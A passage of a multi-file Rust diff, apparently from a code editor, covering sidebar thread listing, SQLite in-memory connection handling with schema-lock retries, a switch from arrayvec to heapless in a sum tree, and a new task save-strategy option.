+ }
+ if info.status == AgentThreadStatus::WaitingForConfirmation {
+ waiting_thread_count += 1;
+ }
+ }
}
if !query.is_empty() {
- let has_threads = !threads.is_empty();
-
let workspace_highlight_positions =
fuzzy_match_positions(&query, &label).unwrap_or_default();
let workspace_matched = !workspace_highlight_positions.is_empty();
@@ -533,7 +962,16 @@ impl Sidebar {
if let Some(positions) = fuzzy_match_positions(&query, title) {
thread.highlight_positions = positions;
}
- if workspace_matched || !thread.highlight_positions.is_empty() {
+ if let Some(worktree_name) = &thread.worktree_name {
+ if let Some(positions) = fuzzy_match_positions(&query, worktree_name) {
+ thread.worktree_highlight_positions = positions;
+ }
+ }
+ let worktree_matched = !thread.worktree_highlight_positions.is_empty();
+ if workspace_matched
+ || !thread.highlight_positions.is_empty()
+ || worktree_matched
+ {
matched_threads.push(thread);
}
}
@@ -542,97 +980,99 @@ impl Sidebar {
continue;
}
- if active_entry_index.is_none()
- && self.focused_thread.is_none()
- && active_workspace
- .as_ref()
- .is_some_and(|active| active == workspace)
- {
- active_entry_index = Some(entries.len());
- }
-
+ project_header_indices.push(entries.len());
entries.push(ListEntry::ProjectHeader {
path_list: path_list.clone(),
label,
workspace: workspace.clone(),
highlight_positions: workspace_highlight_positions,
- has_threads,
+ has_running_threads,
+ waiting_thread_count,
+ is_active,
});
- // Track session IDs and compute active_entry_index as we add
- // thread entries.
for thread in matched_threads {
current_session_ids.insert(thread.session_info.session_id.clone());
- if active_entry_index.is_none() {
- if let Some(focused) = &self.focused_thread {
- if &thread.session_info.session_id == focused {
- active_entry_index = Some(entries.len());
- }
- }
- }
entries.push(thread.into());
}
} else {
- let has_threads = !threads.is_empty();
-
- // Check if this header is the active entry before pushing it.
- if active_entry_index.is_none()
+ let thread_count = threads.len();
+ let is_draft_for_workspace = self.agent_panel_visible
+ && self.active_thread_is_draft
&& self.focused_thread.is_none()
- && active_workspace
- .as_ref()
- .is_some_and(|active| active == workspace)
- {
- active_entry_index = Some(entries.len());
- }
+ && is_active;
+
+ let show_new_thread_entry = thread_count == 0 || is_draft_for_workspace;
+ project_header_indices.push(entries.len());
entries.push(ListEntry::ProjectHeader {
path_list: path_list.clone(),
label,
workspace: workspace.clone(),
highlight_positions: Vec::new(),
- has_threads,
+ has_running_threads,
+ waiting_thread_count,
+ is_active,
});
if is_collapsed {
continue;
}
+ if show_new_thread_entry {
+ entries.push(ListEntry::NewThread {
+ path_list: path_list.clone(),
+ workspace: workspace.clone(),
+ is_active_draft: is_draft_for_workspace,
+ });
+ }
+
let total = threads.len();
let extra_batches = self.expanded_groups.get(&path_list).copied().unwrap_or(0);
let threads_to_show =
DEFAULT_THREADS_SHOWN + (extra_batches * DEFAULT_THREADS_SHOWN);
let count = threads_to_show.min(total);
- let is_fully_expanded = count >= total;
- // Track session IDs and compute active_entry_index as we add
- // thread entries.
- for thread in threads.into_iter().take(count) {
- current_session_ids.insert(thread.session_info.session_id.clone());
- if active_entry_index.is_none() {
- if let Some(focused) = &self.focused_thread {
- if &thread.session_info.session_id == focused {
- active_entry_index = Some(entries.len());
- }
+ let mut promoted_threads: HashSet<acp::SessionId> = HashSet::new();
+
+ // Build visible entries in a single pass. Threads within
+ // the cutoff are always shown. Threads beyond it are shown
+ // only if they should be promoted (running, waiting, or
+ // focused)
+ for (index, thread) in threads.into_iter().enumerate() {
+ let is_hidden = index >= count;
+
+ let session_id = &thread.session_info.session_id;
+ if is_hidden {
+ let is_promoted = thread.status == AgentThreadStatus::Running
+ || thread.status == AgentThreadStatus::WaitingForConfirmation
+ || notified_threads.contains(session_id)
+ || self
+ .focused_thread
+ .as_ref()
+ .is_some_and(|id| id == session_id);
+ if is_promoted {
+ promoted_threads.insert(session_id.clone());
+ }
+ if !promoted_threads.contains(session_id) {
+ continue;
}
}
+
+ current_session_ids.insert(session_id.clone());
entries.push(thread.into());
}
+ let visible = count + promoted_threads.len();
+ let is_fully_expanded = visible >= total;
+
if total > DEFAULT_THREADS_SHOWN {
entries.push(ListEntry::ViewMore {
path_list: path_list.clone(),
- remaining_count: total.saturating_sub(count),
is_fully_expanded,
});
}
-
- if total == 0 {
- entries.push(ListEntry::NewThread {
- path_list: path_list.clone(),
- workspace: workspace.clone(),
- });
- }
}
}
@@ -18,7 +18,7 @@ pub struct Connection {
unsafe impl Send for Connection {}
impl Connection {
- pub(crate) fn open(uri: &str, persistent: bool) -> Result<Self> {
+ fn open_with_flags(uri: &str, persistent: bool, flags: i32) -> Result<Self> {
let mut connection = Self {
sqlite3: ptr::null_mut(),
persistent,
@@ -26,7 +26,6 @@ impl Connection {
_sqlite: PhantomData,
};
- let flags = SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE;
unsafe {
sqlite3_open_v2(
CString::new(uri)?.as_ptr(),
@@ -44,6 +43,14 @@ impl Connection {
Ok(connection)
}
+ pub(crate) fn open(uri: &str, persistent: bool) -> Result<Self> {
+ Self::open_with_flags(
+ uri,
+ persistent,
+ SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE,
+ )
+ }
+
/// Attempts to open the database at uri. If it fails, a shared memory db will be opened
/// instead.
pub fn open_file(uri: &str) -> Self {
@@ -51,13 +58,17 @@ impl Connection {
}
pub fn open_memory(uri: Option<&str>) -> Self {
- let in_memory_path = if let Some(uri) = uri {
- format!("file:{}?mode=memory&cache=shared", uri)
+ if let Some(uri) = uri {
+ let in_memory_path = format!("file:{}?mode=memory&cache=shared", uri);
+ return Self::open_with_flags(
+ &in_memory_path,
+ false,
+ SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE | SQLITE_OPEN_URI,
+ )
+ .expect("Could not create fallback in memory db");
} else {
- ":memory:".to_string()
- };
-
- Self::open(&in_memory_path, false).expect("Could not create fallback in memory db")
+ Self::open(":memory:", false).expect("Could not create fallback in memory db")
+ }
}
pub fn persistent(&self) -> bool {
@@ -265,9 +276,50 @@ impl Drop for Connection {
mod test {
use anyhow::Result;
use indoc::indoc;
+ use std::{
+ fs,
+ sync::atomic::{AtomicUsize, Ordering},
+ };
use crate::connection::Connection;
+ static NEXT_NAMED_MEMORY_DB_ID: AtomicUsize = AtomicUsize::new(0);
+
+ fn unique_named_memory_db(prefix: &str) -> String {
+ format!(
+ "{prefix}_{}_{}",
+ std::process::id(),
+ NEXT_NAMED_MEMORY_DB_ID.fetch_add(1, Ordering::Relaxed)
+ )
+ }
+
+ fn literal_named_memory_paths(name: &str) -> [String; 3] {
+ let main = format!("file:{name}?mode=memory&cache=shared");
+ [main.clone(), format!("{main}-wal"), format!("{main}-shm")]
+ }
+
+ struct NamedMemoryPathGuard {
+ paths: [String; 3],
+ }
+
+ impl NamedMemoryPathGuard {
+ fn new(name: &str) -> Self {
+ let paths = literal_named_memory_paths(name);
+ for path in &paths {
+ let _ = fs::remove_file(path);
+ }
+ Self { paths }
+ }
+ }
+
+ impl Drop for NamedMemoryPathGuard {
+ fn drop(&mut self) {
+ for path in &self.paths {
+ let _ = fs::remove_file(path);
+ }
+ }
+ }
+
#[test]
fn string_round_trips() -> Result<()> {
let connection = Connection::open_memory(Some("string_round_trips"));
@@ -382,6 +434,41 @@ mod test {
assert_eq!(read_blobs, vec![blob]);
}
+ #[test]
+ fn named_memory_connections_do_not_create_literal_backing_files() {
+ let name = unique_named_memory_db("named_memory_connections_do_not_create_backing_files");
+ let guard = NamedMemoryPathGuard::new(&name);
+
+ let connection1 = Connection::open_memory(Some(&name));
+ connection1
+ .exec(indoc! {"
+ CREATE TABLE shared (
+ value INTEGER
+ )"})
+ .unwrap()()
+ .unwrap();
+ connection1
+ .exec("INSERT INTO shared (value) VALUES (7)")
+ .unwrap()()
+ .unwrap();
+
+ let connection2 = Connection::open_memory(Some(&name));
+ assert_eq!(
+ connection2
+ .select_row::<i64>("SELECT value FROM shared")
+ .unwrap()()
+ .unwrap(),
+ Some(7)
+ );
+
+ for path in &guard.paths {
+ assert!(
+ fs::metadata(path).is_err(),
+ "named in-memory database unexpectedly created backing file {path}"
+ );
+ }
+ }
+
#[test]
fn multi_step_statement_works() {
let connection = Connection::open_memory(Some("multi_step_statement_works"));
@@ -7,12 +7,15 @@ use std::{
ops::Deref,
sync::{Arc, LazyLock},
thread,
+ time::Duration,
};
use thread_local::ThreadLocal;
use crate::{connection::Connection, domain::Migrator, util::UnboundedSyncSender};
const MIGRATION_RETRIES: usize = 10;
+const CONNECTION_INITIALIZE_RETRIES: usize = 50;
+const CONNECTION_INITIALIZE_RETRY_DELAY: Duration = Duration::from_millis(1);
type QueuedWrite = Box<dyn 'static + Send + FnOnce()>;
type WriteQueue = Box<dyn 'static + Send + Sync + Fn(QueuedWrite)>;
@@ -197,21 +200,54 @@ impl ThreadSafeConnection {
Self::open_shared_memory(uri)
};
+ if let Some(initialize_query) = connection_initialize_query {
+ let mut last_error = None;
+ let initialized = (0..CONNECTION_INITIALIZE_RETRIES).any(|attempt| {
+ match connection
+ .exec(initialize_query)
+ .and_then(|mut statement| statement())
+ {
+ Ok(()) => true,
+ Err(err)
+ if is_schema_lock_error(&err)
+ && attempt + 1 < CONNECTION_INITIALIZE_RETRIES =>
+ {
+ last_error = Some(err);
+ thread::sleep(CONNECTION_INITIALIZE_RETRY_DELAY);
+ false
+ }
+ Err(err) => {
+ panic!(
+ "Initialize query failed to execute: {}\n\nCaused by:\n{err:#}",
+ initialize_query
+ )
+ }
+ }
+ });
+
+ if !initialized {
+ let err = last_error
+ .expect("connection initialization retries should record the last error");
+ panic!(
+ "Initialize query failed to execute after retries: {}\n\nCaused by:\n{err:#}",
+ initialize_query
+ );
+ }
+ }
+
// Disallow writes on the connection. The only writes allowed for thread safe connections
// are from the background thread that can serialize them.
*connection.write.get_mut() = false;
- if let Some(initialize_query) = connection_initialize_query {
- connection.exec(initialize_query).unwrap_or_else(|_| {
- panic!("Initialize query failed to execute: {}", initialize_query)
- })()
- .unwrap()
- }
-
connection
}
}
+fn is_schema_lock_error(err: &anyhow::Error) -> bool {
+ let message = format!("{err:#}");
+ message.contains("database schema is locked") || message.contains("database is locked")
+}
+
impl ThreadSafeConnection {
/// Special constructor for ThreadSafeConnection which disallows db initialization and migrations.
/// This allows construction to be infallible and not write to the db.
@@ -282,7 +318,7 @@ mod test {
use indoc::indoc;
use std::ops::Deref;
- use std::thread;
+ use std::{thread, time::Duration};
use crate::{domain::Domain, thread_safe_connection::ThreadSafeConnection};
@@ -318,38 +354,21 @@ mod test {
}
#[test]
- #[should_panic]
- fn wild_zed_lost_failure() {
- enum TestWorkspace {}
- impl Domain for TestWorkspace {
- const NAME: &str = "workspace";
-
- const MIGRATIONS: &[&str] = &["
- CREATE TABLE workspaces(
- workspace_id INTEGER PRIMARY KEY,
- dock_visible INTEGER, -- Boolean
- dock_anchor TEXT, -- Enum: 'Bottom' / 'Right' / 'Expanded'
- dock_pane INTEGER, -- NULL indicates that we don't have a dock pane yet
- timestamp TEXT DEFAULT CURRENT_TIMESTAMP NOT NULL,
- FOREIGN KEY(dock_pane) REFERENCES panes(pane_id),
- FOREIGN KEY(active_pane) REFERENCES panes(pane_id)
- ) STRICT;
-
- CREATE TABLE panes(
- pane_id INTEGER PRIMARY KEY,
- workspace_id INTEGER NOT NULL,
- active INTEGER NOT NULL, -- Boolean
- FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id)
- ON DELETE CASCADE
- ON UPDATE CASCADE
- ) STRICT;
- "];
- }
-
- let builder =
- ThreadSafeConnection::builder::<TestWorkspace>("wild_zed_lost_failure", false)
- .with_connection_initialize_query("PRAGMA FOREIGN_KEYS=true");
-
- smol::block_on(builder.build()).unwrap();
+ fn connection_initialize_query_retries_transient_schema_lock() {
+ let name = "connection_initialize_query_retries_transient_schema_lock";
+ let locking_connection = crate::connection::Connection::open_memory(Some(name));
+ locking_connection.exec("BEGIN IMMEDIATE").unwrap()().unwrap();
+ locking_connection
+ .exec("CREATE TABLE test(col TEXT)")
+ .unwrap()()
+ .unwrap();
+
+ let releaser = thread::spawn(move || {
+ thread::sleep(Duration::from_millis(10));
+ locking_connection.exec("ROLLBACK").unwrap()().unwrap();
+ });
+
+ ThreadSafeConnection::create_connection(false, name, Some("PRAGMA FOREIGN_KEYS=true"));
+ releaser.join().unwrap();
}
}
@@ -3,8 +3,5 @@ use gpui::{Menu, MenuItem};
pub fn app_menus() -> Vec<Menu> {
use crate::actions::Quit;
- vec![Menu {
- name: "Storybook".into(),
- items: vec![MenuItem::action("Quit", Quit)],
- }]
+ vec![Menu::new("Storybook").items([MenuItem::action("Quit", Quit)])]
}
@@ -14,7 +14,7 @@ path = "src/sum_tree.rs"
doctest = false
[dependencies]
-arrayvec = "0.7.1"
+heapless.workspace = true
rayon.workspace = true
log.workspace = true
ztracing.workspace = true
@@ -1,5 +1,5 @@
use super::*;
-use arrayvec::ArrayVec;
+use heapless::Vec as ArrayVec;
use std::{cmp::Ordering, mem, sync::Arc};
use ztracing::instrument;
@@ -29,7 +29,7 @@ impl<T: Item + fmt::Debug, D: fmt::Debug> fmt::Debug for StackEntry<'_, T, D> {
#[derive(Clone)]
pub struct Cursor<'a, 'b, T: Item, D> {
tree: &'a SumTree<T>,
- stack: ArrayVec<StackEntry<'a, T, D>, 16>,
+ stack: ArrayVec<StackEntry<'a, T, D>, 16, u8>,
pub position: D,
did_seek: bool,
at_end: bool,
@@ -53,7 +53,7 @@ where
pub struct Iter<'a, T: Item> {
tree: &'a SumTree<T>,
- stack: ArrayVec<StackEntry<'a, T, ()>, 16>,
+ stack: ArrayVec<StackEntry<'a, T, ()>, 16, u8>,
}
impl<'a, 'b, T, D> Cursor<'a, 'b, T, D>
@@ -231,11 +231,13 @@ where
self.position = D::zero(self.cx);
self.at_end = self.tree.is_empty();
if !self.tree.is_empty() {
- self.stack.push(StackEntry {
- tree: self.tree,
- index: self.tree.0.child_summaries().len() as u32,
- position: D::from_summary(self.tree.summary(), self.cx),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: self.tree.0.child_summaries().len() as u32,
+ position: D::from_summary(self.tree.summary(), self.cx),
+ })
+ .unwrap_oob();
}
}
@@ -267,11 +269,13 @@ where
Node::Internal { child_trees, .. } => {
if descending {
let tree = &child_trees[entry.index()];
- self.stack.push(StackEntry {
- position: D::zero(self.cx),
- tree,
- index: tree.0.child_summaries().len() as u32 - 1,
- })
+ self.stack
+ .push(StackEntry {
+ position: D::zero(self.cx),
+ tree,
+ index: tree.0.child_summaries().len() as u32 - 1,
+ })
+ .unwrap_oob();
}
}
Node::Leaf { .. } => {
@@ -297,11 +301,13 @@ where
if self.stack.is_empty() {
if !self.at_end {
- self.stack.push(StackEntry {
- tree: self.tree,
- index: 0,
- position: D::zero(self.cx),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: 0,
+ position: D::zero(self.cx),
+ })
+ .unwrap_oob();
descend = true;
}
self.did_seek = true;
@@ -361,11 +367,13 @@ where
if let Some(subtree) = new_subtree {
descend = true;
- self.stack.push(StackEntry {
- tree: subtree,
- index: 0,
- position: self.position.clone(),
- });
+ self.stack
+ .push(StackEntry {
+ tree: subtree,
+ index: 0,
+ position: self.position.clone(),
+ })
+ .unwrap_oob();
} else {
descend = false;
self.stack.pop();
@@ -467,11 +475,13 @@ where
if !self.did_seek {
self.did_seek = true;
- self.stack.push(StackEntry {
- tree: self.tree,
- index: 0,
- position: D::zero(self.cx),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: 0,
+ position: D::zero(self.cx),
+ })
+ .unwrap_oob();
}
let mut ascending = false;
@@ -503,11 +513,13 @@ where
entry.index += 1;
entry.position = self.position.clone();
} else {
- self.stack.push(StackEntry {
- tree: child_tree,
- index: 0,
- position: self.position.clone(),
- });
+ self.stack
+ .push(StackEntry {
+ tree: child_tree,
+ index: 0,
+ position: self.position.clone(),
+ })
+ .unwrap_oob();
ascending = false;
continue 'outer;
}
@@ -578,11 +590,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> {
let mut descend = false;
if self.stack.is_empty() {
- self.stack.push(StackEntry {
- tree: self.tree,
- index: 0,
- position: (),
- });
+ self.stack
+ .push(StackEntry {
+ tree: self.tree,
+ index: 0,
+ position: (),
+ })
+ .unwrap_oob();
descend = true;
}
@@ -611,11 +625,13 @@ impl<'a, T: Item> Iterator for Iter<'a, T> {
if let Some(subtree) = new_subtree {
descend = true;
- self.stack.push(StackEntry {
- tree: subtree,
- index: 0,
- position: (),
- });
+ self.stack
+ .push(StackEntry {
+ tree: subtree,
+ index: 0,
+ position: (),
+ })
+ .unwrap_oob();
} else {
descend = false;
self.stack.pop();
@@ -748,8 +764,8 @@ trait SeekAggregate<'a, T: Item> {
struct SliceSeekAggregate<T: Item> {
tree: SumTree<T>,
- leaf_items: ArrayVec<T, { 2 * TREE_BASE }>,
- leaf_item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>,
+ leaf_items: ArrayVec<T, { 2 * TREE_BASE }, u8>,
+ leaf_item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>,
leaf_summary: T::Summary,
}
@@ -786,8 +802,8 @@ impl<T: Item> SeekAggregate<'_, T> for SliceSeekAggregate<T> {
summary: &T::Summary,
cx: <T::Summary as Summary>::Context<'_>,
) {
- self.leaf_items.push(item.clone());
- self.leaf_item_summaries.push(summary.clone());
+ self.leaf_items.push(item.clone()).unwrap_oob();
+ self.leaf_item_summaries.push(summary.clone()).unwrap_oob();
Summary::add_summary(&mut self.leaf_summary, summary, cx);
}
fn push_tree(
@@ -3,8 +3,8 @@ mod cursor;
pub mod property_test;
mod tree_map;
-use arrayvec::ArrayVec;
pub use cursor::{Cursor, FilterCursor, Iter};
+use heapless::Vec as ArrayVec;
use rayon::iter::{IndexedParallelIterator, IntoParallelIterator, ParallelIterator as _};
use std::marker::PhantomData;
use std::mem;
@@ -17,6 +17,17 @@ pub const TREE_BASE: usize = 2;
#[cfg(not(test))]
pub const TREE_BASE: usize = 6;
+// Helper for when we cannot use ArrayVec::<T>::push().unwrap() as T doesn't impl Debug
+trait CapacityResultExt {
+ fn unwrap_oob(self);
+}
+
+impl<T> CapacityResultExt for Result<(), T> {
+ fn unwrap_oob(self) {
+ self.unwrap_or_else(|_| panic!("item should fit into fixed size ArrayVec"))
+ }
+}
+
/// An item that can be stored in a [`SumTree`]
///
/// Must be summarized by a type that implements [`Summary`]
@@ -243,8 +254,9 @@ impl<T: Item> SumTree<T> {
let mut iter = iter.into_iter().fuse().peekable();
while iter.peek().is_some() {
- let items: ArrayVec<T, { 2 * TREE_BASE }> = iter.by_ref().take(2 * TREE_BASE).collect();
- let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }> =
+ let items: ArrayVec<T, { 2 * TREE_BASE }, u8> =
+ iter.by_ref().take(2 * TREE_BASE).collect();
+ let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8> =
items.iter().map(|item| item.summary(cx)).collect();
let mut summary = item_summaries[0].clone();
@@ -284,8 +296,8 @@ impl<T: Item> SumTree<T> {
};
let child_summary = child_node.summary();
<T::Summary as Summary>::add_summary(summary, child_summary, cx);
- child_summaries.push(child_summary.clone());
- child_trees.push(child_node);
+ child_summaries.push(child_summary.clone()).unwrap_oob();
+ child_trees.push(child_node.clone()).unwrap_oob();
if child_trees.len() == 2 * TREE_BASE {
parent_nodes.extend(current_parent_node.take());
@@ -315,8 +327,8 @@ impl<T: Item> SumTree<T> {
.into_par_iter()
.chunks(2 * TREE_BASE)
.map(|items| {
- let items: ArrayVec<T, { 2 * TREE_BASE }> = items.into_iter().collect();
- let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }> =
+ let items: ArrayVec<T, { 2 * TREE_BASE }, u8> = items.into_iter().collect();
+ let item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8> =
items.iter().map(|item| item.summary(cx)).collect();
let mut summary = item_summaries[0].clone();
for item_summary in &item_summaries[1..] {
@@ -337,9 +349,9 @@ impl<T: Item> SumTree<T> {
.into_par_iter()
.chunks(2 * TREE_BASE)
.map(|child_nodes| {
- let child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }> =
+ let child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }, u8> =
child_nodes.into_iter().collect();
- let child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }> = child_trees
+ let child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8> = child_trees
.iter()
.map(|child_tree| child_tree.summary().clone())
.collect();
@@ -798,14 +810,16 @@ impl<T: Item> SumTree<T> {
<T::Summary as Summary>::add_summary(summary, other_node.summary(), cx);
let height_delta = *height - other_node.height();
- let mut summaries_to_append = ArrayVec::<T::Summary, { 2 * TREE_BASE }>::new();
- let mut trees_to_append = ArrayVec::<SumTree<T>, { 2 * TREE_BASE }>::new();
+ let mut summaries_to_append = ArrayVec::<T::Summary, { 2 * TREE_BASE }, u8>::new();
+ let mut trees_to_append = ArrayVec::<SumTree<T>, { 2 * TREE_BASE }, u8>::new();
if height_delta == 0 {
summaries_to_append.extend(other_node.child_summaries().iter().cloned());
trees_to_append.extend(other_node.child_trees().iter().cloned());
} else if height_delta == 1 && !other_node.is_underflowing() {
- summaries_to_append.push(other_node.summary().clone());
- trees_to_append.push(other)
+ summaries_to_append
+ .push(other_node.summary().clone())
+ .unwrap_oob();
+ trees_to_append.push(other).unwrap_oob();
} else {
let tree_to_append = child_trees
.last_mut()
@@ -815,15 +829,17 @@ impl<T: Item> SumTree<T> {
child_trees.last().unwrap().0.summary().clone();
if let Some(split_tree) = tree_to_append {
- summaries_to_append.push(split_tree.0.summary().clone());
- trees_to_append.push(split_tree);
+ summaries_to_append
+ .push(split_tree.0.summary().clone())
+ .unwrap_oob();
+ trees_to_append.push(split_tree).unwrap_oob();
}
}
let child_count = child_trees.len() + trees_to_append.len();
if child_count > 2 * TREE_BASE {
- let left_summaries: ArrayVec<_, { 2 * TREE_BASE }>;
- let right_summaries: ArrayVec<_, { 2 * TREE_BASE }>;
+ let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>;
+ let right_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8>;
let left_trees;
let right_trees;
@@ -868,7 +884,7 @@ impl<T: Item> SumTree<T> {
let left_items;
let right_items;
let left_summaries;
- let right_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>;
+ let right_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>;
let midpoint = (child_count + child_count % 2) / 2;
{
@@ -933,8 +949,10 @@ impl<T: Item> SumTree<T> {
*child_summaries.first_mut().unwrap() = first.summary().clone();
if let Some(tree) = res {
if child_trees.len() < 2 * TREE_BASE {
- child_summaries.insert(0, tree.summary().clone());
- child_trees.insert(0, tree);
+ child_summaries
+ .insert(0, tree.summary().clone())
+ .unwrap_oob();
+ child_trees.insert(0, tree).unwrap_oob();
None
} else {
let new_child_summaries = {
@@ -1016,7 +1034,7 @@ impl<T: Item> SumTree<T> {
.iter()
.chain(child_summaries.iter())
.cloned();
- let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> =
+ let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> =
all_summaries.by_ref().take(midpoint).collect();
*child_summaries = all_summaries.collect();
@@ -1065,7 +1083,7 @@ impl<T: Item> SumTree<T> {
.iter()
.chain(item_summaries.iter())
.cloned();
- let left_summaries: ArrayVec<_, { 2 * TREE_BASE }> =
+ let left_summaries: ArrayVec<_, { 2 * TREE_BASE }, u8> =
all_summaries.by_ref().take(midpoint).collect();
*item_summaries = all_summaries.collect();
@@ -1088,11 +1106,11 @@ impl<T: Item> SumTree<T> {
) -> Self {
let height = left.0.height() + 1;
let mut child_summaries = ArrayVec::new();
- child_summaries.push(left.0.summary().clone());
- child_summaries.push(right.0.summary().clone());
+ child_summaries.push(left.0.summary().clone()).unwrap_oob();
+ child_summaries.push(right.0.summary().clone()).unwrap_oob();
let mut child_trees = ArrayVec::new();
- child_trees.push(left);
- child_trees.push(right);
+ child_trees.push(left).unwrap_oob();
+ child_trees.push(right).unwrap_oob();
SumTree(Arc::new(Node::Internal {
height,
summary: sum(child_summaries.iter(), cx),
@@ -1252,13 +1270,13 @@ pub enum Node<T: Item> {
Internal {
height: u8,
summary: T::Summary,
- child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>,
- child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }>,
+ child_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>,
+ child_trees: ArrayVec<SumTree<T>, { 2 * TREE_BASE }, u8>,
},
Leaf {
summary: T::Summary,
- items: ArrayVec<T, { 2 * TREE_BASE }>,
- item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }>,
+ items: ArrayVec<T, { 2 * TREE_BASE }, u8>,
+ item_summaries: ArrayVec<T::Summary, { 2 * TREE_BASE }, u8>,
},
}
@@ -1323,14 +1341,14 @@ impl<T: Item> Node<T> {
}
}
- fn child_trees(&self) -> &ArrayVec<SumTree<T>, { 2 * TREE_BASE }> {
+ fn child_trees(&self) -> &ArrayVec<SumTree<T>, { 2 * TREE_BASE }, u8> {
match self {
Node::Internal { child_trees, .. } => child_trees,
Node::Leaf { .. } => panic!("Leaf nodes have no child trees"),
}
}
- fn items(&self) -> &ArrayVec<T, { 2 * TREE_BASE }> {
+ fn items(&self) -> &ArrayVec<T, { 2 * TREE_BASE }, u8> {
match self {
Node::Leaf { items, .. } => items,
Node::Internal { .. } => panic!("Internal nodes have no items"),
@@ -182,7 +182,7 @@ impl SvgPreviewView {
buffer,
window,
move |this, _buffer, event: &BufferEvent, window, cx| match event {
- BufferEvent::Edited | BufferEvent::Saved => {
+ BufferEvent::Edited { .. } | BufferEvent::Saved => {
this.render_image(window, cx);
}
_ => {}
@@ -23,7 +23,7 @@ pub use debug_format::{
Request, TcpArgumentsTemplate, ZedDebugConfig,
};
pub use task_template::{
- DebugArgsRequest, HideStrategy, RevealStrategy, TaskTemplate, TaskTemplates,
+ DebugArgsRequest, HideStrategy, RevealStrategy, SaveStrategy, TaskTemplate, TaskTemplates,
substitute_variables_in_map, substitute_variables_in_str,
};
pub use util::shell::{Shell, ShellKind};
@@ -75,6 +75,8 @@ pub struct SpawnInTerminal {
pub show_command: bool,
/// Whether to show the rerun button in the terminal tab.
pub show_rerun: bool,
+ /// Which edited buffers to save before running the task.
+ pub save: SaveStrategy,
}
impl SpawnInTerminal {
@@ -172,6 +174,8 @@ pub enum VariableName {
Column,
/// Text from the latest selection.
SelectedText,
+ /// The language of the currently opened buffer (e.g., "Rust", "Python").
+ Language,
/// The symbol selected by the symbol tagging system, specifically the @run capture in a runnables.scm
RunnableSymbol,
/// Open a Picker to select a process ID to use in place
@@ -209,6 +213,7 @@ impl FromStr for VariableName {
"SYMBOL" => Self::Symbol,
"RUNNABLE_SYMBOL" => Self::RunnableSymbol,
"SELECTED_TEXT" => Self::SelectedText,
+ "LANGUAGE" => Self::Language,
"ROW" => Self::Row,
"COLUMN" => Self::Column,
_ => {
@@ -243,6 +248,7 @@ impl std::fmt::Display for VariableName {
Self::Row => write!(f, "{ZED_VARIABLE_NAME_PREFIX}ROW"),
Self::Column => write!(f, "{ZED_VARIABLE_NAME_PREFIX}COLUMN"),
Self::SelectedText => write!(f, "{ZED_VARIABLE_NAME_PREFIX}SELECTED_TEXT"),
+ Self::Language => write!(f, "{ZED_VARIABLE_NAME_PREFIX}LANGUAGE"),
Self::RunnableSymbol => write!(f, "{ZED_VARIABLE_NAME_PREFIX}RUNNABLE_SYMBOL"),
Self::PickProcessId => write!(f, "{ZED_VARIABLE_NAME_PREFIX}PICK_PID"),
Self::Custom(s) => write!(
@@ -72,6 +72,9 @@ pub struct TaskTemplate {
/// Whether to show the command line in the task output.
#[serde(default = "default_true")]
pub show_command: bool,
+ /// Which edited buffers to save before running the task.
+ #[serde(default)]
+ pub save: SaveStrategy,
}
#[derive(Deserialize, Eq, PartialEq, Clone, Debug)]
@@ -109,6 +112,19 @@ pub enum HideStrategy {
OnSuccess,
}
+/// Which edited buffers to save before running a task.
+#[derive(Default, Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
+#[serde(rename_all = "snake_case")]
+pub enum SaveStrategy {
+ #[default]
+ /// Save all edited buffers.
+ All,
+ /// Save the current buffer.
+ Current,
+ /// Don't save any buffers.
+ None,
+}
+
/// A group of Tasks defined in a JSON file.
#[derive(Clone, Debug, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
pub struct TaskTemplates(pub Vec<TaskTemplate>);
@@ -271,6 +287,7 @@ impl TaskTemplate {
show_summary: self.show_summary,
show_command: self.show_command,
show_rerun: true,
+ save: self.save,
},
})
}
@@ -1072,7 +1089,6 @@ mod tests {
command,
..TaskTemplate::default()
};
-
assert!(task.unknown_variables().is_empty());
}
}
@@ -316,7 +316,9 @@ pub fn task_contexts(
let lsp_task_sources = active_editor
.as_ref()
- .map(|active_editor| active_editor.update(cx, |editor, cx| editor.lsp_task_sources(cx)))
+ .map(|active_editor| {
+ active_editor.update(cx, |editor, cx| editor.lsp_task_sources(false, false, cx))
+ })
.unwrap_or_default();
let latest_selection = active_editor.as_ref().map(|active_editor| {
@@ -437,7 +439,10 @@ mod tests {
let worktree_store = project.read_with(cx, |project, _| project.worktree_store());
let rust_language = Arc::new(
Language::new(
- LanguageConfig::default(),
+ LanguageConfig {
+ name: "Rust".into(),
+ ..Default::default()
+ },
Some(tree_sitter_rust::LANGUAGE.into()),
)
.with_outline_query(
@@ -453,7 +458,10 @@ mod tests {
